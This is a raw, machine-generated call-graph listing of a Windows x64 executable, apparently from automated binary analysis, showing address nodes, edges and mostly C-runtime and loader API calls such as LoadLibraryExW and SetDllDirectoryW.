7ff6aae37c91 16735->16737 16736->16737 16738 7ff6aae37cef GetFullPathNameW 16736->16738 16739 7ff6aae37d24 16737->16739 16738->16732 16738->16737 16740 7ff6aae37d98 memcpy_s 16739->16740 16741 7ff6aae37d4d memcpy_s 16739->16741 16740->16716 16741->16740 16742 7ff6aae37d81 16741->16742 16745 7ff6aae37dba 16741->16745 16743 7ff6aae34f08 memcpy_s 11 API calls 16742->16743 16744 7ff6aae37d86 16743->16744 16746 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16744->16746 16745->16740 16747 7ff6aae34f08 memcpy_s 11 API calls 16745->16747 16746->16740 16747->16744 16751 7ff6aae405d0 16748->16751 16752 7ff6aae405fb 16751->16752 16753 7ff6aae40612 16751->16753 16756 7ff6aae34f08 memcpy_s 11 API calls 16752->16756 16754 7ff6aae40637 16753->16754 16755 7ff6aae40616 16753->16755 16789 7ff6aae3f5b8 16754->16789 16777 7ff6aae4073c 16755->16777 16759 7ff6aae40600 16756->16759 16762 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16759->16762 16761 7ff6aae4063c 16765 7ff6aae406e1 16761->16765 16772 7ff6aae40663 16761->16772 16776 7ff6aae4060b __vcrt_freefls 16762->16776 16763 7ff6aae4061f 16764 7ff6aae34ee8 _fread_nolock 11 API calls 16763->16764 16766 7ff6aae40624 16764->16766 16765->16752 16767 7ff6aae406e9 16765->16767 16769 7ff6aae34f08 memcpy_s 11 API calls 16766->16769 16770 7ff6aae37bd8 13 API calls 16767->16770 16768 7ff6aae2c550 _log10_special 8 API calls 16771 7ff6aae40731 16768->16771 16769->16759 16770->16776 16771->16716 16773 7ff6aae37c4c 14 API calls 16772->16773 16774 7ff6aae406a7 16773->16774 16775 7ff6aae37d24 37 API calls 16774->16775 16774->16776 16775->16776 16776->16768 16778 7ff6aae40786 16777->16778 16779 7ff6aae40756 16777->16779 16781 7ff6aae40771 16778->16781 16782 7ff6aae40791 GetDriveTypeW 16778->16782 16780 7ff6aae34ee8 _fread_nolock 11 API calls 16779->16780 16783 7ff6aae4075b 16780->16783 16785 7ff6aae2c550 _log10_special 8 API calls 16781->16785 16782->16781 16784 7ff6aae34f08 memcpy_s 11 API calls 16783->16784 16786 7ff6aae40766 16784->16786 16787 7ff6aae4061b 16785->16787 16788 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16786->16788 16787->16761 16787->16763 16788->16781 16803 7ff6aae4a4d0 16789->16803 16792 7ff6aae3f62c 16794 7ff6aae3eb98 memcpy_s 11 API calls 16792->16794 16793 7ff6aae3f605 16795 7ff6aae2c550 _log10_special 8 API calls 16793->16795 16796 7ff6aae3f63b 16794->16796 16797 7ff6aae3f699 16795->16797 16798 7ff6aae3f645 GetCurrentDirectoryW 16796->16798 16799 7ff6aae3f654 16796->16799 16797->16761 16798->16799 16800 7ff6aae3f659 16798->16800 16801 7ff6aae34f08 memcpy_s 11 API calls 16799->16801 16802 7ff6aae3a948 __free_lconv_num 11 API calls 16800->16802 16801->16800 16802->16793 16804 7ff6aae3f5ee GetCurrentDirectoryW 16803->16804 16804->16792 16804->16793 16806 7ff6aae3f755 16805->16806 16808 7ff6aae3f731 16805->16808 16809 7ff6aae3f78f 16806->16809 16812 7ff6aae3f7ae 16806->16812 16807 7ff6aae3f736 16810 7ff6aae34f08 memcpy_s 11 API calls 16807->16810 16808->16806 16808->16807 16811 7ff6aae34f08 memcpy_s 11 API calls 16809->16811 16813 7ff6aae3f73b 16810->16813 16814 7ff6aae3f794 16811->16814 16822 7ff6aae34f4c 16812->16822 16816 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16813->16816 16817 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16814->16817 16818 7ff6aae3f746 16816->16818 16819 7ff6aae3f79f 16817->16819 16818->16567 16819->16567 16820 7ff6aae3f7bb 16820->16819 16821 7ff6aae404dc 51 API calls 16820->16821 16821->16820 16823 7ff6aae34f70 16822->16823 16829 7ff6aae34f6b 16822->16829 16823->16829 16830 7ff6aae3b150 GetLastError 16823->16830 16829->16820 16831 7ff6aae3b191 FlsSetValue 16830->16831 16832 7ff6aae3b174 FlsGetValue 16830->16832 16833 7ff6aae3b181 16831->16833 16834 7ff6aae3b1a3 16831->16834 16832->16833 16835 7ff6aae3b18b 16832->16835 16836 7ff6aae3b1fd SetLastError 16833->16836 16837 7ff6aae3eb98 memcpy_s 11 API calls 16834->16837 16835->16831 16838 7ff6aae3b21d 16836->16838 16839 7ff6aae34f8b 16836->16839 16840 7ff6aae3b1b2 16837->16840 16860 7ff6aae3a504 16838->16860 16852 7ff6aae3d984 16839->16852 16842 7ff6aae3b1d0 FlsSetValue 16840->16842 16843 7ff6aae3b1c0 FlsSetValue 16840->16843 16846 7ff6aae3b1dc FlsSetValue 16842->16846 16847 7ff6aae3b1ee 16842->16847 16845 7ff6aae3b1c9 16843->16845 16848 7ff6aae3a948 __free_lconv_num 11 API calls 16845->16848 16846->16845 16849 7ff6aae3aef4 memcpy_s 11 API calls 16847->16849 16848->16833 16850 7ff6aae3b1f6 16849->16850 16851 7ff6aae3a948 __free_lconv_num 11 API calls 16850->16851 16851->16836 16853 7ff6aae3d999 16852->16853 16854 7ff6aae34fae 16852->16854 16853->16854 16904 7ff6aae43304 16853->16904 16856 7ff6aae3d9f0 16854->16856 16857 7ff6aae3da18 16856->16857 16858 7ff6aae3da05 16856->16858 16857->16829 16858->16857 16917 7ff6aae42650 16858->16917 16869 7ff6aae43650 16860->16869 16895 7ff6aae43608 16869->16895 16900 7ff6aae402d8 EnterCriticalSection 16895->16900 16905 7ff6aae3b150 _CreateFrameInfo 45 API calls 16904->16905 16906 7ff6aae43313 16905->16906 16907 7ff6aae4335e 16906->16907 16916 7ff6aae402d8 EnterCriticalSection 16906->16916 16907->16854 16918 7ff6aae3b150 _CreateFrameInfo 45 API calls 16917->16918 16919 7ff6aae42659 16918->16919 20817 7ff6aae416b0 20828 7ff6aae473e4 20817->20828 20830 7ff6aae473f1 20828->20830 20829 7ff6aae3a948 __free_lconv_num 11 API calls 20829->20830 20830->20829 20831 7ff6aae4740d 20830->20831 20832 7ff6aae3a948 __free_lconv_num 11 API calls 20831->20832 20833 7ff6aae416b9 20831->20833 20832->20831 20834 7ff6aae402d8 EnterCriticalSection 20833->20834 19512 7ff6aae47c20 19515 7ff6aae425f0 19512->19515 19516 7ff6aae42642 19515->19516 19517 7ff6aae425fd 19515->19517 19521 7ff6aae3b224 19517->19521 19522 7ff6aae3b250 FlsSetValue 19521->19522 19523 7ff6aae3b235 FlsGetValue 19521->19523 19524 7ff6aae3b25d 19522->19524 19525 7ff6aae3b242 19522->19525 19523->19525 19526 7ff6aae3b24a 19523->19526 19528 7ff6aae3eb98 memcpy_s 11 API calls 19524->19528 19527 7ff6aae3a504 _CreateFrameInfo 45 API calls 19525->19527 19529 7ff6aae3b248 19525->19529 19526->19522 19530 7ff6aae3b2c5 19527->19530 19531 7ff6aae3b26c 19528->19531 19541 7ff6aae422c4 19529->19541 19532 7ff6aae3b28a FlsSetValue 19531->19532 19533 7ff6aae3b27a FlsSetValue 19531->19533 19535 7ff6aae3b2a8 19532->19535 19536 7ff6aae3b296 FlsSetValue 19532->19536 19534 7ff6aae3b283 19533->19534 19537 7ff6aae3a948 __free_lconv_num 11 API calls 19534->19537 19538 7ff6aae3aef4 memcpy_s 11 API calls 19535->19538 19536->19534 19537->19525 19539 7ff6aae3b2b0 19538->19539 19540 7ff6aae3a948 __free_lconv_num 11 API calls 19539->19540 19540->19529 19564 7ff6aae42534 19541->19564 19543 7ff6aae422f9 19579 7ff6aae41fc4 19543->19579 19546 7ff6aae3d5fc _fread_nolock 12 API calls 19547 7ff6aae42327 19546->19547 19548 7ff6aae4232f 19547->19548 19551 7ff6aae4233e 19547->19551 19549 7ff6aae3a948 __free_lconv_num 11 API calls 19548->19549 19550 7ff6aae42316 19549->19550 19550->19516 19551->19551 19586 7ff6aae4266c 19551->19586 19554 7ff6aae4243a 19555 7ff6aae34f08 memcpy_s 11 API calls 19554->19555 19557 7ff6aae4243f 19555->19557 19556 7ff6aae42495 19559 7ff6aae424fc 19556->19559 19597 7ff6aae41df4 19556->19597 19560 7ff6aae3a948 __free_lconv_num 11 API calls 19557->19560 19558 7ff6aae42454 19558->19556 19561 7ff6aae3a948 __free_lconv_num 11 API calls 19558->19561 19563 7ff6aae3a948 __free_lconv_num 11 API calls 19559->19563 19560->19550 19561->19556 19563->19550 19565 7ff6aae42557 19564->19565 19566 7ff6aae42561 19565->19566 19612 7ff6aae402d8 EnterCriticalSection 19565->19612 19569 7ff6aae425d3 19566->19569 19572 7ff6aae3a504 _CreateFrameInfo 45 API calls 19566->19572 19569->19543 19573 7ff6aae425eb 19572->19573 19575 7ff6aae42642 19573->19575 19576 7ff6aae3b224 50 API calls 19573->19576 19575->19543 19577 7ff6aae4262c 19576->19577 19578 7ff6aae422c4 65 API calls 19577->19578 19578->19575 19580 7ff6aae34f4c 45 API calls 19579->19580 19581 7ff6aae41fd8 19580->19581 19582 7ff6aae41ff6 19581->19582 19583 7ff6aae41fe4 GetOEMCP 19581->19583 19584 7ff6aae41ffb GetACP 19582->19584 19585 7ff6aae4200b 19582->19585 19583->19585 19584->19585 19585->19546 19585->19550 19587 7ff6aae41fc4 47 API calls 19586->19587 19588 7ff6aae42699 19587->19588 19589 7ff6aae427ef 19588->19589 19591 7ff6aae426d6 IsValidCodePage 19588->19591 19595 7ff6aae426f0 memcpy_s 19588->19595 19590 7ff6aae2c550 _log10_special 8 API calls 19589->19590 19592 7ff6aae42431 19590->19592 19591->19589 19593 7ff6aae426e7 19591->19593 19592->19554 19592->19558 19594 7ff6aae42716 GetCPInfo 19593->19594 19593->19595 19594->19589 19594->19595 19613 7ff6aae420dc 19595->19613 19678 7ff6aae402d8 EnterCriticalSection 19597->19678 19614 7ff6aae42119 GetCPInfo 19613->19614 19623 7ff6aae4220f 19613->19623 19615 7ff6aae4212c 19614->19615 19614->19623 19617 7ff6aae42e40 48 API calls 19615->19617 19616 7ff6aae2c550 _log10_special 8 API calls 19618 7ff6aae422ae 19616->19618 19619 7ff6aae421a3 19617->19619 19618->19589 19624 7ff6aae47b84 19619->19624 19622 7ff6aae47b84 54 API calls 19622->19623 19623->19616 19625 7ff6aae34f4c 45 API calls 19624->19625 19626 7ff6aae47ba9 19625->19626 19629 7ff6aae47850 19626->19629 19630 7ff6aae47891 19629->19630 19631 7ff6aae3f8a0 _fread_nolock MultiByteToWideChar 19630->19631 19634 7ff6aae478db 19631->19634 19632 7ff6aae47b59 19633 7ff6aae2c550 _log10_special 8 API calls 19632->19633 19635 7ff6aae421d6 19633->19635 19634->19632 19636 7ff6aae3d5fc _fread_nolock 12 API calls 19634->19636 19637 7ff6aae47a11 19634->19637 19639 7ff6aae47913 19634->19639 19635->19622 19636->19639 19637->19632 19638 7ff6aae3a948 __free_lconv_num 11 API calls 19637->19638 19638->19632 19639->19637 19640 7ff6aae3f8a0 _fread_nolock MultiByteToWideChar 19639->19640 19641 7ff6aae47986 19640->19641 19641->19637 19660 7ff6aae3f0e4 19641->19660 19644 7ff6aae479d1 19644->19637 19646 7ff6aae3f0e4 __crtLCMapStringW 6 API calls 19644->19646 19645 7ff6aae47a22 19647 7ff6aae3d5fc _fread_nolock 12 API calls 19645->19647 19648 7ff6aae47af4 19645->19648 19650 7ff6aae47a40 19645->19650 19646->19637 19647->19650 19648->19637 19649 7ff6aae3a948 __free_lconv_num 11 API calls 19648->19649 19649->19637 19650->19637 19651 7ff6aae3f0e4 __crtLCMapStringW 6 API calls 19650->19651 19652 7ff6aae47ac0 19651->19652 19652->19648 19653 7ff6aae47af6 19652->19653 19654 7ff6aae47ae0 19652->19654 19656 7ff6aae407e8 WideCharToMultiByte 19653->19656 19655 7ff6aae407e8 WideCharToMultiByte 19654->19655 19657 7ff6aae47aee 19655->19657 19656->19657 19657->19648 19658 7ff6aae47b0e 19657->19658 19658->19637 19659 7ff6aae3a948 __free_lconv_num 11 API calls 19658->19659 19659->19637 19666 7ff6aae3ed10 19660->19666 19663 7ff6aae3f12a 19663->19637 19663->19644 19663->19645 19665 7ff6aae3f193 LCMapStringW 19665->19663 19667 7ff6aae3ed6d 19666->19667 19673 7ff6aae3ed68 __vcrt_InitializeCriticalSectionEx 19666->19673 19667->19663 19675 7ff6aae3f1d0 19667->19675 19668 7ff6aae3ed9d LoadLibraryExW 19670 7ff6aae3ee72 19668->19670 19671 7ff6aae3edc2 GetLastError 19668->19671 19669 7ff6aae3ee92 GetProcAddress 19669->19667 19670->19669 19672 7ff6aae3ee89 FreeLibrary 19670->19672 19671->19673 19672->19669 19673->19667 19673->19668 19673->19669 19674 7ff6aae3edfc LoadLibraryExW 19673->19674 19674->19670 19674->19673 19676 7ff6aae3ed10 __crtLCMapStringW 5 API calls 19675->19676 19677 7ff6aae3f1fe __crtLCMapStringW 19676->19677 19677->19665 20126 7ff6aae3c520 20137 7ff6aae402d8 EnterCriticalSection 20126->20137 19833 7ff6aae3f98c 19834 7ff6aae3fb7e 19833->19834 19836 7ff6aae3f9ce _isindst 19833->19836 19835 7ff6aae34f08 memcpy_s 11 API calls 19834->19835 19853 7ff6aae3fb6e 19835->19853 19836->19834 19839 7ff6aae3fa4e _isindst 19836->19839 19837 7ff6aae2c550 _log10_special 8 API calls 19838 7ff6aae3fb99 19837->19838 19854 7ff6aae46194 19839->19854 19844 7ff6aae3fbaa 19845 7ff6aae3a900 _isindst 17 API calls 19844->19845 19847 7ff6aae3fbbe 19845->19847 19851 7ff6aae3faab 19851->19853 19878 7ff6aae461d8 19851->19878 19853->19837 19855 7ff6aae3fa6c 19854->19855 19856 7ff6aae461a3 19854->19856 19860 7ff6aae45598 19855->19860 19885 7ff6aae402d8 EnterCriticalSection 19856->19885 19861 7ff6aae3fa81 19860->19861 19862 7ff6aae455a1 19860->19862 19861->19844 19866 7ff6aae455c8 19861->19866 19863 7ff6aae34f08 memcpy_s 11 API calls 19862->19863 19864 7ff6aae455a6 19863->19864 19865 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 19864->19865 19865->19861 19867 7ff6aae455d1 19866->19867 19869 7ff6aae3fa92 19866->19869 19868 7ff6aae34f08 memcpy_s 11 API calls 19867->19868 19870 7ff6aae455d6 19868->19870 19869->19844 19872 7ff6aae455f8 19869->19872 19871 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 19870->19871 19871->19869 19873 7ff6aae3faa3 19872->19873 19874 7ff6aae45601 19872->19874 19873->19844 19873->19851 19875 7ff6aae34f08 memcpy_s 11 API calls 19874->19875 19876 7ff6aae45606 19875->19876 19877 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 19876->19877 19877->19873 19886 7ff6aae402d8 EnterCriticalSection 19878->19886 19688 7ff6aae35410 19689 7ff6aae3541b 19688->19689 19697 7ff6aae3f2a4 19689->19697 19710 7ff6aae402d8 EnterCriticalSection 19697->19710 19711 7ff6aae4adfe 19712 7ff6aae4ae0d 19711->19712 19713 7ff6aae4ae17 19711->19713 19715 7ff6aae40338 LeaveCriticalSection 19712->19715 19400 7ff6aae22fe0 19401 7ff6aae22ff0 19400->19401 19402 7ff6aae2302b 19401->19402 19403 7ff6aae23041 19401->19403 19404 7ff6aae22710 54 API calls 19402->19404 19405 7ff6aae23061 19403->19405 19416 7ff6aae23077 __vcrt_freefls 19403->19416 19408 7ff6aae23037 __vcrt_freefls 19404->19408 19406 7ff6aae22710 54 API calls 19405->19406 19406->19408 19407 7ff6aae2c550 _log10_special 8 API calls 19409 7ff6aae231fa 19407->19409 19408->19407 19410 7ff6aae21470 116 API calls 19410->19416 19411 7ff6aae23349 19413 7ff6aae22710 54 API calls 19411->19413 19412 7ff6aae21c80 49 API calls 19412->19416 19413->19408 19414 7ff6aae23333 19415 7ff6aae22710 54 API calls 19414->19415 19415->19408 19416->19408 19416->19410 19416->19411 19416->19412 19416->19414 19417 7ff6aae2330d 19416->19417 19419 7ff6aae23207 19416->19419 19418 7ff6aae22710 54 API calls 19417->19418 19418->19408 19420 7ff6aae23273 19419->19420 19428 7ff6aae3a404 19419->19428 19422 7ff6aae2329e 19420->19422 19423 7ff6aae23290 19420->19423 19435 7ff6aae22dd0 19422->19435 19424 7ff6aae3a404 37 API calls 19423->19424 19426 7ff6aae2329c 19424->19426 19439 7ff6aae22500 19426->19439 19429 7ff6aae3a41b 19428->19429 19432 7ff6aae3a44c 19428->19432 19430 7ff6aae3a4a4 __std_exception_copy 37 API calls 19429->19430 19429->19432 19431 7ff6aae3a448 19430->19431 19431->19432 19433 7ff6aae3a900 _isindst 17 API calls 19431->19433 19432->19420 19434 7ff6aae3a478 19433->19434 19436 7ff6aae22e04 19435->19436 19437 7ff6aae22f6f 19436->19437 19438 7ff6aae3a404 37 API calls 19436->19438 19437->19426 19438->19437 19440 7ff6aae2252c 19439->19440 19443 7ff6aae22536 19439->19443 19441 7ff6aae29390 2 API calls 19440->19441 19441->19443 19442 7ff6aae2254b 19444 7ff6aae22560 19442->19444 19446 7ff6aae29390 2 API calls 19442->19446 19443->19442 19445 7ff6aae29390 2 API calls 19443->19445 19449 7ff6aae22390 19444->19449 19445->19442 19446->19444 19448 7ff6aae2257c __vcrt_freefls 19448->19408 19450 7ff6aae2c850 19449->19450 19451 7ff6aae223a9 GetModuleHandleW 19450->19451 19452 7ff6aae223e5 memcpy_s 19451->19452 19453 7ff6aae225c0 48 API calls 19452->19453 19454 7ff6aae2242b memcpy_s 19453->19454 19455 7ff6aae3796c 37 API calls 19454->19455 19456 7ff6aae22451 19455->19456 19457 7ff6aae3796c 37 API calls 19456->19457 19458 7ff6aae2245e 19457->19458 19459 7ff6aae3796c 37 API calls 19458->19459 19460 7ff6aae2246b DialogBoxIndirectParamW 19459->19460 19461 7ff6aae224a1 __vcrt_freefls 19460->19461 19462 7ff6aae224c7 19461->19462 19463 7ff6aae224c1 DeleteObject 19461->19463 19464 7ff6aae224d9 19462->19464 19465 7ff6aae224d3 DestroyIcon 19462->19465 19463->19462 19466 7ff6aae2c550 _log10_special 8 API calls 19464->19466 19465->19464 19467 7ff6aae224ea 19466->19467 19467->19448 19999 7ff6aae2cb50 20000 7ff6aae2cb60 19999->20000 20016 7ff6aae39ba8 20000->20016 20002 7ff6aae2cb6c 20022 7ff6aae2ce48 20002->20022 20004 7ff6aae2d12c 7 API calls 20006 7ff6aae2cc05 20004->20006 20005 7ff6aae2cb84 _RTC_Initialize 20014 7ff6aae2cbd9 20005->20014 20027 7ff6aae2cff8 20005->20027 20008 7ff6aae2cb99 20030 7ff6aae39014 20008->20030 20014->20004 20015 7ff6aae2cbf5 20014->20015 20017 7ff6aae39bb9 20016->20017 20018 7ff6aae34f08 memcpy_s 11 API calls 20017->20018 20019 7ff6aae39bc1 20017->20019 20020 7ff6aae39bd0 20018->20020 20019->20002 20021 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 20020->20021 20021->20019 20023 7ff6aae2ce59 20022->20023 20026 7ff6aae2ce5e __scrt_acquire_startup_lock 20022->20026 20024 7ff6aae2d12c 7 API calls 20023->20024 20023->20026 20025 7ff6aae2ced2 20024->20025 20026->20005 20055 7ff6aae2cfbc 20027->20055 20029 7ff6aae2d001 20029->20008 20031 7ff6aae39034 20030->20031 20045 7ff6aae2cba5 20030->20045 20032 7ff6aae3903c 20031->20032 20033 7ff6aae39052 GetModuleFileNameW 20031->20033 20034 7ff6aae34f08 memcpy_s 11 API calls 20032->20034 20037 7ff6aae3907d 20033->20037 20035 7ff6aae39041 20034->20035 20036 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 20035->20036 20036->20045 20070 7ff6aae38fb4 20037->20070 20040 7ff6aae390c5 20041 7ff6aae34f08 memcpy_s 11 API calls 20040->20041 20042 7ff6aae390ca 20041->20042 20044 7ff6aae3a948 __free_lconv_num 11 API calls 20042->20044 20043 7ff6aae390dd 20047 7ff6aae3912b 20043->20047 20049 7ff6aae39144 20043->20049 20052 7ff6aae390ff 20043->20052 20044->20045 20045->20014 20054 7ff6aae2d0cc InitializeSListHead 20045->20054 20046 7ff6aae3a948 __free_lconv_num 11 API calls 20046->20045 20048 7ff6aae3a948 __free_lconv_num 11 API calls 20047->20048 20051 7ff6aae39134 20048->20051 20049->20049 20050 7ff6aae3a948 __free_lconv_num 11 API calls 20049->20050 20050->20052 20053 7ff6aae3a948 __free_lconv_num 11 API calls 20051->20053 20052->20046 20053->20045 20056 7ff6aae2cfd6 20055->20056 20058 7ff6aae2cfcf 20055->20058 20059 7ff6aae3a1ec 20056->20059 20058->20029 20062 7ff6aae39e28 20059->20062 20069 7ff6aae402d8 EnterCriticalSection 20062->20069 20071 7ff6aae38fcc 20070->20071 20075 7ff6aae39004 20070->20075 20072 7ff6aae3eb98 memcpy_s 11 API calls 20071->20072 20071->20075 20073 7ff6aae38ffa 20072->20073 20074 7ff6aae3a948 __free_lconv_num 11 API calls 20073->20074 20074->20075 20075->20040 20075->20043 19722 7ff6aae3afd0 19723 7ff6aae3afea 19722->19723 19724 7ff6aae3afd5 19722->19724 19728 7ff6aae3aff0 19724->19728 19729 7ff6aae3b03a 19728->19729 19730 7ff6aae3b032 19728->19730 19732 7ff6aae3a948 __free_lconv_num 11 API calls 19729->19732 19731 7ff6aae3a948 __free_lconv_num 11 API calls 19730->19731 19731->19729 19733 7ff6aae3b047 19732->19733 19734 7ff6aae3a948 __free_lconv_num 11 API calls 19733->19734 19735 7ff6aae3b054 19734->19735 19736 7ff6aae3a948 __free_lconv_num 11 API calls 19735->19736 19737 7ff6aae3b061 19736->19737 19738 7ff6aae3a948 __free_lconv_num 11 API calls 19737->19738 19739 7ff6aae3b06e 19738->19739 19740 7ff6aae3a948 __free_lconv_num 11 API calls 19739->19740 19741 7ff6aae3b07b 19740->19741 19742 7ff6aae3a948 __free_lconv_num 11 API calls 19741->19742 19743 7ff6aae3b088 19742->19743 19744 7ff6aae3a948 __free_lconv_num 11 API calls 19743->19744 19745 7ff6aae3b095 19744->19745 19746 7ff6aae3a948 __free_lconv_num 11 API calls 19745->19746 19747 7ff6aae3b0a5 19746->19747 19748 7ff6aae3a948 __free_lconv_num 11 API calls 19747->19748 19749 7ff6aae3b0b5 19748->19749 19754 7ff6aae3ae94 19749->19754 19768 7ff6aae402d8 EnterCriticalSection 19754->19768 20076 7ff6aae39d50 20079 7ff6aae39ccc 20076->20079 20086 7ff6aae402d8 EnterCriticalSection 20079->20086 16920 7ff6aae2cc3c 16941 7ff6aae2ce0c 16920->16941 16923 7ff6aae2cd88 17100 7ff6aae2d12c IsProcessorFeaturePresent 16923->17100 16924 7ff6aae2cc58 __scrt_acquire_startup_lock 16926 7ff6aae2cd92 16924->16926 16931 7ff6aae2cc76 __scrt_release_startup_lock 16924->16931 16927 7ff6aae2d12c 7 API calls 16926->16927 16928 7ff6aae2cd9d _CreateFrameInfo 16927->16928 16929 7ff6aae2cc9b 16930 7ff6aae2cd21 16947 7ff6aae2d274 16930->16947 16931->16929 16931->16930 17089 7ff6aae39b2c 16931->17089 16933 7ff6aae2cd26 16950 7ff6aae21000 16933->16950 16938 7ff6aae2cd49 16938->16928 17096 7ff6aae2cf90 16938->17096 16942 7ff6aae2ce14 16941->16942 16943 7ff6aae2ce20 __scrt_dllmain_crt_thread_attach 16942->16943 16944 7ff6aae2ce2d 16943->16944 16945 7ff6aae2cc50 16943->16945 16944->16945 17107 7ff6aae2d888 16944->17107 16945->16923 16945->16924 16948 7ff6aae4a4d0 memcpy_s 16947->16948 16949 7ff6aae2d28b GetStartupInfoW 16948->16949 16949->16933 16951 7ff6aae21009 16950->16951 17134 7ff6aae35484 16951->17134 16953 7ff6aae237fb 17141 7ff6aae236b0 16953->17141 16958 7ff6aae2c550 _log10_special 8 API calls 16961 7ff6aae23ca7 16958->16961 16959 7ff6aae2391b 17249 7ff6aae245c0 16959->17249 16960 7ff6aae2383c 17240 7ff6aae21c80 16960->17240 17094 7ff6aae2d2b8 GetModuleHandleW 16961->17094 16964 7ff6aae2385b 17213 7ff6aae28830 16964->17213 16966 7ff6aae2396a 17272 7ff6aae22710 16966->17272 16970 7ff6aae2388e 16977 7ff6aae238bb __vcrt_freefls 16970->16977 17244 7ff6aae289a0 16970->17244 16971 7ff6aae2395d 16972 7ff6aae23962 16971->16972 16973 7ff6aae23984 16971->16973 17268 7ff6aae3004c 16972->17268 16975 7ff6aae21c80 49 API calls 16973->16975 16978 7ff6aae239a3 16975->16978 16979 7ff6aae28830 14 API calls 16977->16979 16986 7ff6aae238de __vcrt_freefls 16977->16986 16983 7ff6aae21950 115 API calls 16978->16983 16979->16986 16981 7ff6aae23a0b 16982 7ff6aae289a0 40 API calls 16981->16982 16984 7ff6aae23a17 16982->16984 16985 7ff6aae239ce 16983->16985 16987 7ff6aae289a0 40 API calls 16984->16987 16985->16964 16988 7ff6aae239de 16985->16988 16992 7ff6aae2390e __vcrt_freefls 16986->16992 17283 7ff6aae28940 16986->17283 16990 7ff6aae23a23 16987->16990 16989 7ff6aae22710 54 API calls 16988->16989 16998 7ff6aae23808 __vcrt_freefls 16989->16998 16991 7ff6aae289a0 40 API calls 16990->16991 16991->16992 16993 7ff6aae28830 14 API calls 16992->16993 16994 7ff6aae23a3b 16993->16994 16995 7ff6aae23b2f 16994->16995 16996 7ff6aae23a60 __vcrt_freefls 16994->16996 16997 7ff6aae22710 54 API calls 16995->16997 16999 7ff6aae28940 40 API calls 16996->16999 17007 7ff6aae23aab 16996->17007 16997->16998 16998->16958 16999->17007 17000 7ff6aae28830 14 API calls 17001 7ff6aae23bf4 __vcrt_freefls 17000->17001 17002 7ff6aae23c46 17001->17002 17003 7ff6aae23d41 17001->17003 17004 7ff6aae23c50 17002->17004 17005 7ff6aae23cd4 17002->17005 17338 7ff6aae244e0 17003->17338 17290 7ff6aae290e0 17004->17290 17009 7ff6aae28830 14 API calls 17005->17009 17007->17000 17012 7ff6aae23ce0 17009->17012 17010 7ff6aae23d4f 17013 7ff6aae23d71 17010->17013 17014 7ff6aae23d65 17010->17014 17015 7ff6aae23c61 17012->17015 17020 7ff6aae23ced 17012->17020 17018 7ff6aae21c80 49 API calls 17013->17018 17341 7ff6aae24630 17014->17341 17022 7ff6aae22710 54 API calls 17015->17022 17016 7ff6aae23cb3 17307 7ff6aae28660 17016->17307 17031 7ff6aae23d2b __vcrt_freefls 17018->17031 17023 7ff6aae21c80 49 API calls 17020->17023 17022->16998 17028 7ff6aae23d0b 17023->17028 17024 7ff6aae23dbc 17226 7ff6aae29390 17024->17226 17026 7ff6aae23cc8 17026->17031 17027 7ff6aae23cbf 17027->17015 17028->17031 17032 7ff6aae23d12 17028->17032 17029 7ff6aae23da7 LoadLibraryExW 17029->17024 17030 7ff6aae23dcf SetDllDirectoryW 17035 7ff6aae23e02 17030->17035 17079 7ff6aae23e52 17030->17079 17031->17024 17031->17029 17034 7ff6aae22710 54 API calls 17032->17034 17034->16998 17037 7ff6aae28830 14 API calls 17035->17037 17036 7ff6aae24000 17039 7ff6aae2400a PostMessageW GetMessageW 17036->17039 17040 7ff6aae2402d 17036->17040 17045 7ff6aae23e0e __vcrt_freefls 17037->17045 17038 7ff6aae23f13 17418 7ff6aae233c0 17038->17418 17039->17040 17231 7ff6aae23360 17040->17231 17043 7ff6aae23f23 17437 7ff6aae290c0 LocalFree 17043->17437 17046 7ff6aae23eea 17045->17046 17050 7ff6aae23e46 17045->17050 17049 7ff6aae28940 40 API calls 17046->17049 17049->17079 17050->17079 17344 7ff6aae26dc0 17050->17344 17057 7ff6aae26fc0 FreeLibrary 17060 7ff6aae24053 17057->17060 17065 7ff6aae23e79 17068 7ff6aae23e9a 17065->17068 17080 7ff6aae23e7d 17065->17080 17365 7ff6aae26e00 17065->17365 17068->17080 17384 7ff6aae271b0 17068->17384 17079->17036 17079->17038 17080->17079 17400 7ff6aae22a50 17080->17400 17090 7ff6aae39b64 17089->17090 17091 7ff6aae39b43 17089->17091 19395 7ff6aae3a3d8 17090->19395 17091->16930 17095 7ff6aae2d2c9 17094->17095 17095->16938 17098 7ff6aae2cfa1 17096->17098 17097 7ff6aae2cd60 17097->16929 17098->17097 17099 7ff6aae2d888 7 API calls 17098->17099 17099->17097 17101 7ff6aae2d152 _isindst memcpy_s 17100->17101 17102 7ff6aae2d171 RtlCaptureContext RtlLookupFunctionEntry 17101->17102 17103 7ff6aae2d1d6 memcpy_s 17102->17103 17104 7ff6aae2d19a RtlVirtualUnwind 17102->17104 17105 7ff6aae2d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17103->17105 17104->17103 17106 7ff6aae2d256 _isindst 17105->17106 17106->16926 17108 7ff6aae2d89a 17107->17108 17109 7ff6aae2d890 17107->17109 17108->16945 17113 7ff6aae2dc24 17109->17113 17114 7ff6aae2d895 17113->17114 17115 7ff6aae2dc33 17113->17115 17117 7ff6aae2dc90 17114->17117 17121 7ff6aae2de60 17115->17121 17118 7ff6aae2dcbb 17117->17118 17119 7ff6aae2dc9e DeleteCriticalSection 17118->17119 17120 7ff6aae2dcbf 17118->17120 17119->17118 17120->17108 17125 7ff6aae2dcc8 17121->17125 17131 7ff6aae2ddb2 TlsFree 17125->17131 17132 7ff6aae2dd0c __vcrt_InitializeCriticalSectionEx 17125->17132 17126 7ff6aae2dd3a LoadLibraryExW 17128 7ff6aae2ddd9 17126->17128 17129 7ff6aae2dd5b GetLastError 17126->17129 17127 7ff6aae2ddf9 GetProcAddress 17127->17131 17128->17127 17130 7ff6aae2ddf0 FreeLibrary 17128->17130 17129->17132 17130->17127 17132->17126 17132->17127 17132->17131 17133 7ff6aae2dd7d LoadLibraryExW 